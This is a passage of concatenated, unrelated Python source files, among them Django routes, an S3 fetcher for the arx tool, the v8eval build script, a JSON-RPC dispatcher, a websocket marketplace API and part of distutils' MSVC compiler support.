lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(ResearchResourceProposalV30Rc2, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ResearchResourceProposalV30Rc2):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
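# Usage sketch (illustrative): an empty proposal serializes to a dict of
# None-valued attributes, which is handy for smoke-testing the generated model.
if __name__ == '__main__':
    proposal = ResearchResourceProposalV30Rc2()
    print(proposal.to_dict())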
|
from django.conf.urls import url
from . import views
from django.views.generic import RedirectView
from django.core.urlresolvers import reverse_lazy
urlpatterns = [
url(r'^$', RedirectView.as_view(url=reverse_lazy('list_job')), name='index'),
url(r'^list-job$', views.list_job, name='list_job'),
url(r'^new-job$', views.new_job, name='new_job'),
url(r'^send-to-chronos$', views.send_to_chronos, name='send_to_chronos'),
url(r'^ajax-list-job$', views.ajax_list_job, name='ajax_list_job'),
]
|
import boto3
from sh import Command, chmod, cp, mkdir, rsync, ErrorReturnCode
import uritools
from ..decorators import schemes
from ..err import Err
from .files import File, FileTar
from .http import HTTP, HTTPTar, HTTPJar
from .jar import Jar
from .core import onepath, oneurl, SignableURL, twopaths
from .tar import Tar
class S3(SignableURL):
"""Links objects in S3.
The URL can end with a ``/`` to give it directory nature; otherwise it has
file nature. With directory nature, the directory is unpacked recursively.
"""
@oneurl
@schemes('s3')
def __init__(self, url):
self.url = url
if url.fragment is not None:
raise Invalid('Arx can not work with plain S3 URLs that have '
'fragments.')
@property
def dirlike(self):
return self.url.path.endswith('/')
@property
def base(self):
# Allows subclasses to inherit this implementation by throwing away the
# prefix.
scheme = self.url.scheme.split('+')[-1]
return self.url._replace(scheme=scheme, fragment=None)
def signed_get(self, seconds=3600):
if self.dirlike:
raise Invalid('Not able to sign directory-like S3 URLs.')
        # S3 object keys do not include the leading slash from the URL path
        data = dict(Bucket=self.url.host, Key=self.url.path.lstrip('/'))
s3 = boto3.client('s3')
link = s3.generate_presigned_url('get_object', data, ExpiresIn=seconds)
return link
def sign(self):
return HTTP(self.signed_get())
@onepath
def cache(self, cache):
data = self.dataname(cache)
cmd = Command('aws')
sub = 'sync' if self.dirlike else 'cp'
cmd('s3', sub, uritools.uriunsplit(self.base), str(data))
return File('file:///' + str(data))
@twopaths
def place(self, cache, path):
mkdir('-p', path.dirname)
if self.dirlike:
rsync('-ai', str(self.data(cache)) + '/', str(path))
else:
cp(str(self.data(cache)), str(path))
@onepath
    def run(self, cache, args=()):
if self.dirlike:
raise Invalid('Arx can not run directory-like (ending with `/`) '
'S3 paths.')
item = self.data(cache)
chmod('a+rx', str(item))
cmd = Command(str(item))
cmd(*args)
class S3Tar(Tar, S3):
"""Links to tar archives available over S3.
Note that these URLs may not end with a slash.
These URLs have directory nature unless a fragment is passed, as described
under :class:`~arx.sources.tar.Tar`.
"""
@oneurl
@schemes('tar+s3')
def __init__(self, url):
self.url = url
if self.dirlike:
raise Invalid('Arx can not treat directory-like (ending with `/`) '
'S3 paths like tarballs.')
@onepath
def cache(self, cache):
as_file = super(S3Tar, self).cache(cache)
return FileTar.resolve(as_file.resolved)
def sign(self):
return HTTPTar('tar+' + self.signed_get())
class S3Jar(Jar, S3):
@oneurl
@schemes('jar+s3')
def __init__(self, url):
self.url = url
if self.url.fragment is not None:
raise Invalid('Arx can not handle Jar S3 URLs with fragments.')
if self.dirlike:
raise Invalid('Arx can not treat directory-like (ending with `/`) '
'S3 paths like Jars.')
def sign(self):
return HTTPJar('jar+' + self.signed_get())
class Invalid(Err):
pass
def no_credentials():
aws = Command('aws')
try:
aws('sts', 'get-caller-identity')
return False
except ErrorReturnCode:
return True
|
from satella.threads import BaseThread
from satella.contrib.instrumentation_as_json import export
import time
class InstrumentationSaverThread(BaseThread):
    """Periodically dumps instrumentation data as JSON to a configured file."""
def __init__(self, insmgr, confsection):
BaseThread.__init__(self)
self.interval = confsection['save_interval']
self.savetarget = confsection['save_json_to']
self.insmgr = insmgr
def run(self):
while not self._terminating:
time.sleep(self.interval)
with open(self.savetarget, 'wb') as x:
x.write(export(self.insmgr))
|
from django import template
from django.template.loader import render_to_string
def split_into_variables(token):
# split and remove name
tokens = token.split_contents()[1:]
return map(template.Variable, tokens)
class GenericTemplateTag(template.Node):
    def __init__(self, *args, **kwargs):
        # Subclasses must provide their own __init__ accepting the tag's variables.
        raise NotImplementedError(self)
    def render(self, context):
        # Matches django.template.Node.render(context); subclasses must override.
        raise NotImplementedError(self)
def resolve(self, context, obj):
return (
obj.resolve(context) if hasattr(obj, 'resolve')
else obj
)
@classmethod
def invoke(cls, parser, token):
variables = split_into_variables(token)
try:
return cls(*variables)
except TypeError as e:
if e.args[0].startswith('__init__'):
message = 'Bad arguments for {}: {}'.format(cls, e)
raise TypeError(message) from e
else:
raise
def render_to_string(self, *args, **kwargs):
return render_to_string(
self.template,
*args, **kwargs
)
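# Illustrative subclass sketch (names below are hypothetical, not from the
# source): a tag node that resolves one variable and renders it with a fixed
# template, registered through the usual Django Library mechanism.
register = template.Library()
class ShowObjectNode(GenericTemplateTag):
    template = 'includes/show_object.html'  # hypothetical template path
    def __init__(self, obj):
        self.obj = obj
    def render(self, context):
        return self.render_to_string({'object': self.resolve(context, self.obj)})
register.tag('show_object', ShowObjectNode.invoke)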
|
from sen.docker_backend import DockerBackend, DockerContainer
from sen.tui.views.container_info import ProcessList
from tests.real import mock
def test_short_id():
mock()
b = DockerBackend()
operation = DockerContainer({"Status": "Up", "Id": "voodoo"}, b).top()
top_response = operation.response
pt = ProcessList(top_response)
# 24502
# \ 24542
# \ 23743
# \ 18725
# \ 18733
# \ 18743
# \ 23819
root_process = pt.get_root_process()
assert root_process.pid == "24502"
assert pt.get_parent_process(root_process) is None
p_24542 = pt.get_first_child_process(root_process)
assert p_24542.pid == "24542"
assert pt.get_last_child_process(root_process).pid == "24542"
p_23743 = pt.get_first_child_process(p_24542)
assert p_23743.pid == "23743"
assert pt.get_last_child_process(p_24542).pid == "23743"
p_18725 = pt.get_first_child_process(p_23743)
assert p_18725.pid == "18725"
assert pt.get_prev_sibling(p_18725) is None
assert pt.get_parent_process(p_18725).pid == "23743"
p_18733 = pt.get_next_sibling(p_18725)
assert p_18733.pid == "18733"
p_23819 = pt.get_last_child_process(p_23743)
assert p_23819.pid == "23819"
assert pt.get_next_sibling(p_23819) is None
assert pt.get_parent_process(p_23819).pid == "23743"
p_18743 = pt.get_prev_sibling(p_23819)
assert p_18743.pid == "18743"
assert pt.get_prev_sibling(p_18733) is p_18725
assert pt.get_next_sibling(p_18733) is p_18743
assert pt.get_prev_sibling(p_18743) is p_18733
assert pt.get_next_sibling(p_18743) is p_23819
|
from distutils.core import setup, Extension
from os import system, environ
from os.path import abspath, dirname, exists
from sys import platform
v8eval_root = abspath(dirname(__file__))
v8_dir = v8eval_root + '/v8'
py_dir = v8eval_root + '/python'
py_v8eval_dir = py_dir + '/v8eval'
system(v8eval_root + '/build.sh')
system('cp ' + v8eval_root + '/src/v8eval.h ' + py_v8eval_dir)
system('cp ' + v8eval_root + '/src/v8eval_python.h ' + py_v8eval_dir)
system('swig -c++ -python -outdir ' + py_v8eval_dir + ' -o ' + py_v8eval_dir + '/v8eval_wrap.cxx ' + py_v8eval_dir + '/v8eval.i')
system('cat ' + py_dir + '/_v8eval.py >> ' + py_v8eval_dir + '/v8eval.py')
if platform == 'linux' or platform == 'linux2':
environ['CC'] = v8_dir + '/third_party/llvm-build/Release+Asserts/bin/clang'
environ['CXX'] = v8_dir + '/third_party/llvm-build/Release+Asserts/bin/clang++'
environ['PATH'] = v8_dir + '/third_party/binutils/Linux_x64/Release/bin:' + environ['PATH']
include_dirs = [v8_dir, v8_dir + '/include']
library_dirs = [v8eval_root + '/build', v8_dir + '/out.gn/x64.release/obj']
libraries = ['v8eval',
             'v8eval_python',
             'v8_libplatform',
             'v8_base',
             'v8_libbase',
             'v8_libsampler',
             'v8_init',
             'v8_initializers',
             'v8_nosnapshot',
             'torque_generated_initializers']
extra_compile_args = ['-O3', '-std=c++14', '-stdlib=libc++']
if platform == 'linux' or platform == 'linux2':
library_dirs += [v8_dir + '/out.gn/x64.release/obj/buildtools/third_party/libc++',
v8_dir + '/out.gn/x64.release/obj/buildtools/third_party/libc++abi']
libraries += ['rt', 'c++', 'c++abi']
extra_compile_args += ['-isystem' + v8_dir + '/buildtools/third_party/libc++/trunk/include',
'-isystem' + v8_dir + '/buildtools/third_party/libc++abi/trunk/include']
v8eval_module = Extension(
'_v8eval',
sources=[py_v8eval_dir + '/v8eval_wrap.cxx'],
libraries=libraries,
include_dirs=include_dirs,
library_dirs=library_dirs,
extra_compile_args=extra_compile_args)
description = 'Run JavaScript engine V8 in Python'
long_description = description
try:
import pypandoc
long_description = pypandoc.convert('README.md', 'rst')
except ImportError:
pass
system("rm -rf " + v8_dir + "/third_party/perfetto")
system("mkdir " + v8_dir + "/buildtools/third_party/libc++/trunk/test/std/experimental/filesystem/Inputs/static_test_env/dne")
setup(name='v8eval',
version='0.3.2',
author='Yoshiyuki Mineo',
author_email='Yoshiyuki.Mineo@sony.com',
license='MIT',
url='https://github.com/sony/v8eval',
description=description,
long_description=long_description,
keywords='v8 js javascript binding',
ext_modules=[v8eval_module],
py_modules=['v8eval'],
package_dir={'': 'python/v8eval'},
classifiers=['License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: Implementation :: CPython',
'Operating System :: POSIX :: Linux',
'Operating System :: MacOS :: MacOS X',
'Intended Audience :: Developers',
'Topic :: Software Development :: Libraries'])
|
import sys
import traceback
import rpcrequest
import rpcresponse
import rpcerror
import rpcjson
def rpcmethod(func):
"""
Decorator
Sign the decorated method as JSON-RPC-Method
"""
# Sign the function as JSON-RPC-Method
func.rpcmethod = True
# Return the function itself
return func
class JsonRpc(object):
"""
JSON-RPC
"""
methods = {}
    def __init__(self, methods = None):
        """
        Initializes the JSON-RPC-Class
        :param methods: Json-RPC-Methods. `None` or dictionary with
            method names as keys and functions as values. Syntax::
                {
                    "<method_name>": <method_function>,
                    ...
                }
        """
        # Copy the class-level dict so instances do not share registered methods
        self.methods = dict(self.methods)
        if methods:
            self.methods.update(methods)
def call(self, json_request):
"""
Parses the *json_request*, calls the function(s)
and returns the *json_response*.
:param json_request: JSON-RPC-string with one or more JSON-RPC-requests
:return: JSON-RPC-string with one or more responses.
"""
# List for the responses
responses = []
# List with requests
requests = rpcrequest.parse_request_json(json_request)
if not isinstance(requests, list):
requests = [requests]
# Every JSON-RPC request in a batch of requests
for request in requests:
# Request-Data
jsonrpc = request.jsonrpc
id = request.id
method = request.get("method", "")
if method not in self.methods:
# Check if requested method is signed as *rpcmethod*
_method = getattr(self, method, None)
if (
_method and
callable(_method) and
getattr(_method, "rpcmethod", False)
):
self.methods[method] = _method
if method not in self.methods:
# Method not found error
responses.append(
rpcresponse.Response(
jsonrpc = jsonrpc,
id = id,
error = rpcerror.MethodNotFound(
data = u"Method name: '%s'" % method
)
)
)
continue
# split positional and named params
positional_params, named_params = request.get_splitted_params()
# Call the method with parameters
try:
rpc_function = self.methods[method]
result = rpc_function(*positional_params, **named_params)
                # No return value is OK if we don't have an ID (=notification)
if result is None:
if id:
responses.append(
rpcresponse.Response(
jsonrpc = jsonrpc,
id = id,
error = rpcerror.InternalError(
data = u"No result from JSON-RPC method."
)
)
)
else:
# Successful response
responses.append(
rpcresponse.Response(jsonrpc = jsonrpc, id = id, result = result)
)
except TypeError, err:
traceback_info = "".join(traceback.format_exception(*sys.exc_info()))
if "takes exactly" in unicode(err) and "arguments" in unicode(err):
responses.append(
rpcresponse.Response(
jsonrpc = jsonrpc,
id = id,
error = rpcerror.InvalidParams(data = traceback_info)
)
)
else:
responses.append(
rpcresponse.Response(
jsonrpc = jsonrpc,
id = id,
error = rpcerror.InternalError(data = traceback_info)
)
)
except rpcerror.JsonRpcError, err:
responses.append(
rpcresponse.Response(
jsonrpc = jsonrpc,
id = id,
error = err
)
)
except BaseException, err:
traceback_info = "".join(traceback.format_exception(*sys.exc_info()))
if hasattr(err, "data"):
error_data = err.data
else:
error_data = None
responses.append(
rpcresponse.Response(
jsonrpc = jsonrpc,
id = id,
error = rpcerror.InternalError(
data = error_data or traceback_info
)
)
)
# Convert responses to dictionaries and filter it
responses_ = []
for response in responses:
if response.id:
responses_.append(response.to_dict())
responses = responses_
# Return as JSON-string (batch or normal)
if responses:
if len(requests) == 1:
return rpcjson.dumps(responses[0])
elif len(requests) > 1:
return rpcjson.dumps(responses)
def __call__(self, json_request):
"""
Redirects the requests to *self.call*
"""
return self.call(json_request)
def __getitem__(self, key):
"""
Gets back the requested method
"""
return self.methods[key]
def __setitem__(self, key, value):
"""
Appends or replaces a method
"""
self.methods[key] = value
def __delitem__(self, key):
"""
Deletes a method
"""
del self.methods[key]
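# Usage sketch (illustrative): expose one method and dispatch a JSON-RPC 2.0
# request string; `rpcrequest` is assumed to parse standard requests.
class Calculator(JsonRpc):
    @rpcmethod
    def add(self, a, b):
        return a + b
if __name__ == "__main__":
    rpc = Calculator()
    print(rpc.call(u'{"jsonrpc": "2.0", "id": 1, "method": "add", "params": [1, 2]}'))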
|
import threading
from queue import Queue
class WorkQueue(Queue):
    '''Queue subclass that can also signal when no more work is expected.'''
    def __init__(self, *args):
        super().__init__(*args)
        self._all_jobs_submitted = threading.Event()
def all_jobs_submitted(self):
'''Indicate that no more work is expected on this queue.'''
self._all_jobs_submitted.set()
def is_done(self):
'''Determine if there is more work expected on this queue.'''
return self._all_jobs_submitted.is_set() and self.empty()
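# Usage sketch (illustrative): a consumer thread drains the queue and exits
# once all submitted jobs have been processed.
if __name__ == '__main__':
    import queue
    def consume(q):
        while not q.is_done():
            try:
                item = q.get(timeout=0.1)
            except queue.Empty:
                continue
            print('processing', item)
            q.task_done()
    wq = WorkQueue()
    worker = threading.Thread(target=consume, args=(wq,))
    worker.start()
    for i in range(5):
        wq.put(i)
    wq.all_jobs_submitted()
    worker.join()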
|
import matplotlib as mpl
import pylab as pl
from pylab import rc
rc('axes', linewidth=1.2)
mpl.rcParams['font.size'] = 18.
mpl.rcParams['font.family'] = 'serif'
mpl.rcParams['font.serif'] = ['Times']  # alternative: ['Computer Modern Roman']
mpl.rcParams['font.weight'] = 'bold'
mpl.rcParams['text.usetex'] = True
mpl.rcParams['axes.labelsize'] = 18
mpl.rcParams['xtick.labelsize'] = 20.
mpl.rcParams['ytick.labelsize'] = 20.
mpl.rcParams['xtick.major.size'] = 10.
mpl.rcParams['xtick.minor.size'] = 5.
mpl.rcParams['ytick.major.size'] = 10.
mpl.rcParams['ytick.minor.size'] = 5.
params = {'legend.fontsize': 20,
          # 'legend.linewidth': 1,
          'legend.numpoints': 1,
          'legend.handletextpad': 1
          }
pl.rcParams.update(params)
print("pylab set up, rcParams")
|
__author__ = 'chris'
import json
import os
import time
from constants import DATA_FOLDER
from db.datastore import VendorStore, MessageStore
from random import shuffle
from autobahn.twisted.websocket import WebSocketServerFactory, WebSocketServerProtocol
from protos.countries import CountryCode
from protos.objects import Plaintext_Message, Value
from protos import objects
from twisted.internet import defer
from binascii import unhexlify
from dht.node import Node
class WSProtocol(WebSocketServerProtocol):
"""
Handles new incoming requests coming from a websocket.
"""
def onOpen(self):
self.factory.register(self)
def get_vendors(self, message_id):
if message_id in self.factory.outstanding:
vendors = self.factory.outstanding[message_id]
else:
vendors = VendorStore().get_vendors()
shuffle(vendors)
self.factory.outstanding[message_id] = vendors
def count_results(results):
to_query = 0
for result in results:
if not result:
to_query += 1
for node in vendors[:to_query]:
dl.append(self.factory.mserver.get_user_metadata(node).addCallback(handle_response, node))
defer.gatherResults(dl).addCallback(count_results)
def handle_response(metadata, node):
if metadata is not None:
vendor = {
"id": message_id,
"vendor":
{
"guid": node.id.encode("hex"),
"name": metadata.name,
"handle": metadata.handle,
"avatar_hash": metadata.avatar_hash.encode("hex"),
"nsfw": metadata.nsfw
}
}
self.sendMessage(json.dumps(vendor, indent=4), False)
vendors.remove(node)
return True
else:
VendorStore().delete_vendor(node.id)
vendors.remove(node)
return False
dl = []
for node in vendors[:30]:
dl.append(self.factory.mserver.get_user_metadata(node).addCallback(handle_response, node))
defer.gatherResults(dl).addCallback(count_results)
def get_homepage_listings(self, message_id):
if message_id not in self.factory.outstanding:
self.factory.outstanding[message_id] = []
vendors = VendorStore().get_vendors()
shuffle(vendors)
def count_results(results):
to_query = 30
for result in results:
to_query -= result
shuffle(vendors)
if to_query/3 > 0 and len(vendors) > 0:
for node in vendors[:to_query/3]:
dl.append(self.factory.mserver.get_listings(node).addCallback(handle_response, node))
defer.gatherResults(dl).addCallback(count_results)
def handle_response(listings, node):
count = 0
if listings is not None:
for l in listings.listing:
if l.contract_hash not in self.factory.outstanding[message_id]:
listing_json = {
"id": message_id,
"listing":
{
"guid": node.id.encode("hex"),
"handle": listings.handle,
"avatar_hash": listings.avatar_hash.encode("hex"),
"title": l.title,
"contract_hash": l.contract_hash.encode("hex"),
"thumbnail_hash": l.thumbnail_hash.encode("hex"),
"category": l.category,
"price": l.price,
"currency_code": l.currency_code,
"nsfw": l.nsfw,
"origin": str(CountryCode.Name(l.origin)),
"ships_to": []
}
}
for country in l.ships_to:
listing_json["listing"]["ships_to"].append(str(CountryCode.Name(country)))
if not os.path.isfile(DATA_FOLDER + 'cache/' + l.thumbnail_hash.encode("hex")):
self.factory.mserver.get_image(node, l.thumbnail_hash)
if not os.path.isfile(DATA_FOLDER + 'cache/' + listings.avatar_hash.encode("hex")):
self.factory.mserver.get_image(node, listings.avatar_hash)
self.sendMessage(json.dumps(listing_json, indent=4), False)
count += 1
self.factory.outstanding[message_id].append(l.contract_hash)
if count == 3:
return count
vendors.remove(node)
else:
VendorStore().delete_vendor(node.id)
vendors.remove(node)
return count
dl = []
for vendor in vendors[:10]:
dl.append(self.factory.mserver.get_listings(vendor).addCallback(handle_response, vendor))
defer.gatherResults(dl).addCallback(count_results)
def send_message(self, guid, handle, message, subject, message_type, recipient_encryption_key):
MessageStore().save_message(guid, handle, "", recipient_encryption_key, subject,
message_type, message, "", time.time(), "", True)
def send(node_to_send):
n = node_to_send if node_to_send is not None else Node(unhexlify(guid), "123.4.5.6", 1234)
self.factory.mserver.send_message(n, recipient_encryption_key,
Plaintext_Message.Type.Value(message_type.upper()),
message, subject)
self.factory.kserver.resolve(unhexlify(guid)).addCallback(send)
def search(self, message_id, keyword):
def respond(l, node):
if l is not None:
listing_json = {
"id": message_id,
"listing":
{
"guid": node.id.encode("hex"),
"title": l.title,
"contract_hash": l.contract_hash.encode("hex"),
"thumbnail_hash": l.thumbnail_hash.encode("hex"),
"category": l.category,
"price": l.price,
"currency_code": l.currency_code,
"nsfw": l.nsfw,
"origin": str(CountryCode.Name(l.origin)),
"ships_to": []
}
}
for country in l.ships_to:
listing_json["listing"]["ships_to"].append(str(CountryCode.Name(country)))
self.sendMessage(json.dumps(listing_json, indent=4), False)
def parse_results(values):
if values is not None:
for v in values:
try:
val = Value()
val.ParseFromString(v)
n = objects.Node()
n.ParseFromString(val.serializedData)
node_to_ask = Node(n.guid, n.ip, n.port, n.signedPublicKey, True)
self.factory.mserver.get_contract_metadata(node_to_ask,
val.valueKey).addCallback(respond, node_to_ask)
except Exception:
pass
self.factory.kserver.get(keyword.lower()).addCallback(parse_results)
def onMessage(self, payload, isBinary):
try:
request_json = json.loads(payload)
message_id = request_json["request"]["id"]
if request_json["request"]["command"] == "get_vendors":
self.get_vendors(message_id)
elif request_json["request"]["command"] == "get_homepage_listings":
self.get_homepage_listings(message_id)
elif request_json["request"]["command"] == "search":
self.search(message_id, request_json["request"]["keyword"].lower())
elif request_json["request"]["command"] == "send_message":
self.send_message(request_json["request"]["guid"],
request_json["request"]["handle"],
request_json["request"]["message"],
request_json["request"]["subject"],
request_json["request"]["message_type"],
request_json["request"]["recipient_key"])
except Exception:
pass
def connectionLost(self, reason):
WebSocketServerProtocol.connectionLost(self, reason)
self.factory.unregister(self)
class WSFactory(WebSocketServerFactory):
"""
Simple broadcast server broadcasting any message it receives to all
currently connected clients.
"""
def __init__(self, url, mserver, kserver, debug=False, debugCodePaths=False):
WebSocketServerFactory.__init__(self, url, debug=debug, debugCodePaths=debugCodePaths)
self.mserver = mserver
self.kserver = kserver
self.outstanding = {}
self.clients = []
def register(self, client):
if client not in self.clients:
self.clients.append(client)
def unregister(self, client):
if client in self.clients:
self.clients.remove(client)
def push(self, msg):
for c in self.clients:
c.sendMessage(msg)
|
from .stop_words import STOP_WORDS
from ...language import Language
class LatvianDefaults(Language.Defaults):
stop_words = STOP_WORDS
class Latvian(Language):
lang = "lv"
Defaults = LatvianDefaults
__all__ = ["Latvian"]
|
"""distutils.msvc9compiler
Contains MSVCCompiler, an implementation of the abstract CCompiler class
for the Microsoft Visual Studio 2008.
The module is compatible with VS 2005 and VS 2008. You can find legacy support
for older versions of VS in distutils.msvccompiler.
"""
import os
import subprocess
import sys
import re
from distutils.errors import DistutilsExecError, DistutilsPlatformError, \
CompileError, LibError, LinkError
from distutils.ccompiler import CCompiler, gen_preprocess_options, \
gen_lib_options
from distutils import log
from distutils.util import get_platform
import winreg
RegOpenKeyEx = winreg.OpenKeyEx
RegEnumKey = winreg.EnumKey
RegEnumValue = winreg.EnumValue
RegError = winreg.error
HKEYS = (winreg.HKEY_USERS,
winreg.HKEY_CURRENT_USER,
winreg.HKEY_LOCAL_MACHINE,
winreg.HKEY_CLASSES_ROOT)
NATIVE_WIN64 = (sys.platform == 'win32' and sys.maxsize > 2**32)
if NATIVE_WIN64:
# Visual C++ is a 32-bit application, so we need to look in
# the corresponding registry branch, if we're running a
# 64-bit Python on Win64
VS_BASE = r"Software\Wow6432Node\Microsoft\VisualStudio\%0.1f"
WINSDK_BASE = r"Software\Wow6432Node\Microsoft\Microsoft SDKs\Windows"
NET_BASE = r"Software\Wow6432Node\Microsoft\.NETFramework"
else:
VS_BASE = r"Software\Microsoft\VisualStudio\%0.1f"
WINSDK_BASE = r"Software\Microsoft\Microsoft SDKs\Windows"
NET_BASE = r"Software\Microsoft\.NETFramework"
PLAT_TO_VCVARS = {
'win32' : 'x86',
'win-amd64' : 'amd64',
'win-ia64' : 'ia64',
}
class Reg:
"""Helper class to read values from the registry
"""
def get_value(cls, path, key):
for base in HKEYS:
d = cls.read_values(base, path)
if d and key in d:
return d[key]
raise KeyError(key)
get_value = classmethod(get_value)
def read_keys(cls, base, key):
"""Return list of registry keys."""
try:
handle = RegOpenKeyEx(base, key)
except RegError:
return None
L = []
i = 0
while True:
try:
k = RegEnumKey(handle, i)
except RegError:
break
L.append(k)
i += 1
return L
read_keys = classmethod(read_keys)
def read_values(cls, base, key):
"""Return dict of registry keys and values.
All names are converted to lowercase.
"""
try:
handle = RegOpenKeyEx(base, key)
except RegError:
return None
d = {}
i = 0
while True:
try:
name, value, type = RegEnumValue(handle, i)
except RegError:
break
name = name.lower()
d[cls.convert_mbcs(name)] = cls.convert_mbcs(value)
i += 1
return d
read_values = classmethod(read_values)
def convert_mbcs(s):
dec = getattr(s, "decode", None)
if dec is not None:
try:
s = dec("mbcs")
except UnicodeError:
pass
return s
convert_mbcs = staticmethod(convert_mbcs)
class MacroExpander:
def __init__(self, version):
self.macros = {}
self.vsbase = VS_BASE % version
self.load_macros(version)
def set_macro(self, macro, path, key):
self.macros["$(%s)" % macro] = Reg.get_value(path, key)
def load_macros(self, version):
self.set_macro("VCInstallDir", self.vsbase + r"\Setup\VC", "productdir")
self.set_macro("VSInstallDir", self.vsbase + r"\Setup\VS", "productdir")
self.set_macro("FrameworkDir", NET_BASE, "installroot")
try:
if version >= 8.0:
self.set_macro("FrameworkSDKDir", NET_BASE,
"sdkinstallrootv2.0")
else:
raise KeyError("sdkinstallrootv2.0")
except KeyError:
raise DistutilsPlatformError(
"""Python was built with Visual Studio 2008;
extensions must be built with a compiler that can generate compatible binaries.
Visual Studio 2008 was not found on this system. If you have Cygwin installed,
you can try compiling with MingW32, by passing "-c mingw32" to setup.py.""")
if version >= 9.0:
self.set_macro("FrameworkVersion", self.vsbase, "clr version")
self.set_macro("WindowsSdkDir", WINSDK_BASE, "currentinstallfolder")
else:
p = r"Software\Microsoft\NET Framework Setup\Product"
for base in HKEYS:
try:
h = RegOpenKeyEx(base, p)
except RegError:
continue
key = RegEnumKey(h, 0)
d = Reg.get_value(base, r"%s\%s" % (p, key))
self.macros["$(FrameworkVersion)"] = d["version"]
def sub(self, s):
for k, v in self.macros.items():
s = s.replace(k, v)
return s
def get_build_version():
"""Return the version of MSVC that was used to build Python.
For Python 2.3 and up, the version number is included in
sys.version. For earlier versions, assume the compiler is MSVC 6.
"""
prefix = "MSC v."
i = sys.version.find(prefix)
if i == -1:
return 6
i = i + len(prefix)
s, rest = sys.version[i:].split(" ", 1)
majorVersion = int(s[:-2]) - 6
minorVersion = int(s[2:3]) / 10.0
# I don't think paths are affected by minor version in version 6
if majorVersion == 6:
minorVersion = 0
if majorVersion >= 6:
return majorVersion + minorVersion
# else we don't know what version of the compiler this is
return None
def normalize_and_reduce_paths(paths):
"""Return a list of normalized paths with duplicates removed.
The current order of paths is maintained.
"""
# Paths are normalized so things like: /a and /a/ aren't both preserved.
reduced_paths = []
for p in paths:
np = os.path.normpath(p)
# XXX(nnorwitz): O(n**2), if reduced_paths gets long perhaps use a set.
if np not in reduced_paths:
reduced_paths.append(np)
return reduced_paths
def removeDuplicates(variable):
"""Remove duplicate values of an environment variable.
"""
oldList = variable.split(os.pathsep)
newList = []
for i in oldList:
if i not in newList:
newList.append(i)
newVariable = os.pathsep.join(newList)
return newVariable
def find_vcvarsall(version):
"""Find the vcvarsall.bat file
At first it tries to find the productdir of VS 2008 in the registry. If
that fails it falls back to the VS90COMNTOOLS env var.
"""
vsbase = VS_BASE % version
try:
productdir = Reg.get_value(r"%s\Setup\VC" % vsbase,
"productdir")
except KeyError:
log.debug("Unable to find productdir in registry")
productdir = None
if not productdir or not os.path.isdir(productdir):
toolskey = "VS%0.f0COMNTOOLS" % version
toolsdir = os.environ.get(toolskey, None)
if toolsdir and os.path.isdir(toolsdir):
productdir = os.path.join(toolsdir, os.pardir, os.pardir, "VC")
productdir = os.path.abspath(productdir)
if not os.path.isdir(productdir):
log.debug("%s is not a valid directory" % productdir)
return None
else:
log.debug("Env var %s is not set or invalid" % toolskey)
if not productdir:
log.debug("No productdir found")
return None
vcvarsall = os.path.join(productdir, "vcvarsall.bat")
if os.path.isfile(vcvarsall):
return vcvarsall
log.debug("Unable to find vcvarsall.bat")
return None
def query_vcvarsall(version, arch="x86"):
"""Launch vcvarsall.bat and read the settings from its environment
"""
vcvarsall = find_vcvarsall(version)
interesting = set(("include", "lib", "libpath", "path"))
result = {}
if vcvarsall is None:
raise DistutilsPlatformError("Unable to find vcvarsall.bat")
log.debug("Calling 'vcvarsall.bat %s' (version=%s)", arch, version)
popen = subprocess.Popen('"%s" %s & set' % (vcvarsall, arch),
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
try:
stdout, stderr = popen.communicate()
if popen.wait() != 0:
raise DistutilsPlatformError(stderr.decode("mbcs"))
stdout = stdout.decode("mbcs")
for line in stdout.split("\n"):
line = Reg.convert_mbcs(line)
if '=' not in line:
continue
line = line.strip()
key, value = line.split('=', 1)
key = key.lower()
if key in interesting:
if value.endswith(os.pathsep):
value = value[:-1]
result[key] = removeDuplicates(value)
finally:
popen.stdout.close()
popen.stderr.close()
if len(result) != len(interesting):
raise ValueError(str(list(result.keys())))
return result
VERSION = get_build_version()
if VERSION < 8.0:
raise DistutilsPlatformError("VC %0.1f is not supported by this module" % VERSION)
class MSVCCompiler(CCompiler) :
"""Concrete class that implements an interface to Microsoft Visual C++,
as defined by the CCompiler abstract class."""
compiler_type = 'msvc'
# Just set this so CCompiler's constructor doesn't barf. We currently
# don't use the 'set_executables()' bureaucracy provided by CCompiler,
# as it really isn't necessary for this sort of single-compiler class.
# Would be nice to have a consistent interface with UnixCCompiler,
# though, so it's worth thinking about.
executables = {}
# Private class data (need to distinguish C from C++ source for compiler)
_c_extensions = ['.c']
_cpp_extensions = ['.cc', '.cpp', '.cxx']
_rc_extensions = ['.rc']
_mc_extensions = ['.mc']
# Needed for the filename generation methods provided by the
# base class, CCompiler.
src_extensions = (_c_extensions + _cpp_extensions +
_rc_extensions + _mc_extensions)
res_extension = '.res'
obj_extension = '.obj'
static_lib_extension = '.lib'
shared_lib_extension = '.dll'
static_lib_format = shared_lib_format = '%s%s'
exe_extension = '.exe'
def __init__(self, verbose=0, dry_run=0, force=0):
CCompiler.__init__ (self, verbose, dry_run, force)
self.__version = VERSION
self.__root = r"Software\Microsoft\VisualStudio"
# self.__macros = MACROS
self.__paths = []
# target platform (.plat_name is consistent with 'bdist')
self.plat_name = None
self.__arch = None # deprecated name
self.initialized = False
def initialize(self, plat_name=None):
# multi-init means we would need to check platform same each time...
assert not self.initialized, "don't init multiple times"
if plat_name is None:
plat_name = get_platform()
# sanity check for platforms to prevent obscure errors later.
ok_plats = 'win32', 'win-amd64', 'win-ia64'
if plat_name not in ok_plats:
raise DistutilsPlatformError("--plat-name must be one of %s" %
(ok_plats,))
